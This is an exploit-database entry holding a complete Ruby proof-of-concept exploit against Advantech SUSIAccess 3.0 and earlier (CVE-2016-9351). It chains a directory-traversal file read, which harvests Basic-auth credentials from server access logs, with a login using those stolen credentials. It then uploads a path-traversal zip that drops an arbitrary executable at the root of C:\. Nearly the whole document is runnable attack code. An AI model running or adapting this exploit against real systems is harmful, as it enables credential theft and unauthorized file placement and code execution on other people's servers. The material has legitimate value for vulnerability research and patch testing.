Advantech SUSIAccess <= 3.0 - 'RecoveryMgmt' File Upload



EKU-ID: 6822 CVE: 2016-9351 OSVDB-ID:
Author: James Fitts Published: 2017-08-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#! /usr/bin/env ruby
 
=begin
Exploit Title: Advantech SUSIAccess RecoveryMgmt File Upload
Date: 07/31/17
Exploit Author: james fitts
Vendor Homepage: http://www.advantech.com/
Version: Advantech SUSIAccess <= 3.0
Tested on: Windows 7 SP1
Relavant Advisories:
    ZDI-16-630
    ZDI-16-628
    CVE-2016-9349
    CVE-2016-9351
    BID-94629
    ICSA-16-336-04
 
Notes:
    This PoC will upload AcronisInstaller.exe to the root of C:\
    You can modify this to drop files where ever you want on the
    filesystem.
 
    By default the script will use the directory traversal vuln
    to pull down the log files and parse for the base64 encoded
    credentials. Once it has that, it will use them to log into
    the application and upload the malicious zip file.
=end
 
require 'mime/types'
require 'fileutils'
require 'net/http'
require 'nokogiri'
require 'base64'
require 'digest'
require 'date'
require 'uri'
require 'zip'
 
def uploadZip(target, creds, cookies)
    uri = URI("http://#{target}:8080/webresources/RecoveryMgmt/upload")
    bound = "AaBbCcDdEe"
 
    path = Dir.pwd
    zipfile = "#{path}/update.zip"
 
    post_data = []
    post_data << "--#{bound}\r\n"
    post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_LastUpdateName\""
    post_data << "\r\n\r\n\r\n"
    post_data << "--#{bound}\r\n"
    post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_UploadFileFullName\""
    post_data << "\r\n\r\nupdate.zip\r\n"
    post_data << "--#{bound}\r\n"
    post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_Content\""
    post_data << "\r\n\r\n"
    post_data << "<request Authorization=\"#{creds[0].to_s}\"/>\r\n"
    post_data << "--#{bound}\r\n"
    post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_FileInput\"; filename=\"update.zip\""
    post_data << "\r\nContent-Type: application/zip"
    post_data << "\r\n\r\n"
    post_data << File.read(zipfile)
    post_data << "\r\n\r\n--#{bound}--\r\n"
 
    req = Net::HTTP::Post.new(uri, initheader = {
            'Cookie'                        =>   cookies,
            'Authorization'         =>   "Basic #{creds[0].to_s}",
            'X-Requested-With'  =>   "XMLHttpRequest",
            'Content-Type'          =>   "multipart/form-data; boundary=#{bound}",
            'User-Agent'                =>   "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
            'Accept-Language'       =>   "en-US,en;q=0.5",
            'Accept'                        =>   "text/plain, */*; q=0.01",
            'Connection'                =>   "close"
    })
 
    req.body = post_data.join
 
    http = Net::HTTP.new("#{target}", 8080)
    res = http.start {|http| http.request(req)}
 
    if res.code =~ /200/
        puts "[+] Upload successful!"
    end
end
 
def craftZip(target, payload)
    path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml"
 
    uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{path}")
    res = Net::HTTP.get_response(uri)
    xml = Nokogiri::XML(res.body)
    ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/version').to_s.split("=")[1].split("\"")[1]
    kern_ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/kernal_version').to_s.split("=")[1].split("\"")[1]
 
    # version information doesn't matter
    # the application will still extract the zip
    # file regardless of whether or not its
    # a greater version or lesser
    f = File.open("LatestVersion.txt", 'w')
    f.puts("Installer Version: #{ver}\r\nApplication Version: #{kern_ver}")
    f.close
 
    f = File.open("md5.txt", 'w')
    md5 = Digest::MD5.hexdigest(File.read("AcronisInstaller.exe"))
    f.puts md5
    f.close
 
    path = Dir.pwd
    zipfile = "#{path}/update.zip"
 
    if File.exist?(zipfile)
        FileUtils.rm(zipfile)
    end
 
    files = ["AcronisInstaller.exe", "LatestVersion.txt", "md5.txt"]
 
    levels = "../" * 10
    Zip::File.open(zipfile, Zip::File::CREATE) do |zip|
        files.each do |fname|
            if fname == "AcronisInstaller.exe"
                zip.add("#{levels}#{fname}", fname)
            end
            zip.add(fname, fname)
        end
    end
 
    if File.exist?(zipfile)
        puts "[!] Malicious zip created successfully"
    end
end
 
def doLogin(target, creds)
    formattedDate = DateTime.now.strftime("%a %b %d %Y %H:%M:%S GMT-0400 (EDT)")
    formattedDate = URI::encode(formattedDate)
 
    uri = URI("http://#{target}:8080/frmServer.jsp?d=#{formattedDate}")
 
    res = Net::HTTP.get_response(uri)
    jsessid = res.header['Set-Cookie'].split(';')[0]
    cookies = "deviceType=pc; log4jq=OFF; selectedLang=en_US; #{jsessid}"
 
    uname = Base64.decode64(creds[0].to_s).split(":")[0]
    pass = Base64.decode64(creds[0].to_s).split(":")[1]
 
    data = "<request Authorization=\"#{creds[0].to_s}\">"
    data << "<item name=\"username\" value=\"#{uname}\"/>"
    data << "<item name=\"password\" value=\"#{pass}\"/>"
    data << "</request>"
 
    puts "[+] Attempting login with pilfered credentials now"
    uri = URI("http://#{target}:8080/webresources/AccountMgmt/Login")
 
    req = Net::HTTP::Post.new(uri, initheader = {
        'Content-Type'      =>  "application/xml",
        'Cookies'           =>  cookies,
        'Authorization'     =>  "Basic #{creds[0].to_s}",
        'X-Requested-With'  =>  'XMLHttpRequest'
    })
 
    req.body = data
 
    http = Net::HTTP.new("#{target}", 8080)
    res = http.start {|http| http.request(req)}
 
    if res.body =~ /<result><role name/
        puts "[+] Login successful!"
        return cookies
    else
        puts "[-] Something went wrong..."
    end
    
end
 
def getCreds(target)
    cnt = 1
    d = Date.today
    d.strftime("%y-%m-%d")
    creds = []
 
    while cnt < 31
        fdate = d - cnt
        cnt += 1
 
        path = "../../../../../../../../../../Program Files\\Apache Software Foundation\\logs\\"
        file = "localhost_access_log.#{fdate}.txt"
        full_path = path + file
 
        uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{full_path}")
 
        res = Net::HTTP.get_response(uri)
 
        if res.code =~ /200/
            creds << res.body.scan(/(?<=Authorization=%22)[A-Za-z0-9=]+/)
        end
    end
    return creds.flatten.uniq
end
 
##
# Main
##
if ARGV.length != 1
    puts "Usage:\r\n\truby #{$0} [TARGET IP]"
else
    target = ARGV[0]
    payload = "AcronisInstaller.exe"
    
    puts "[+] Extracting credentials now..."
    credentials = getCreds(target)
    if credentials.length > 0
        puts "[!] Credentials found!"
        cookies = doLogin(target, credentials)
        puts "[+] Crafting malicious zip now..."
        craftZip(target, payload)
        uploadZip(target, credentials, cookies)
    else
        puts "[-] Credentials not found.. Try searching for more log files.."
        exit
    end
end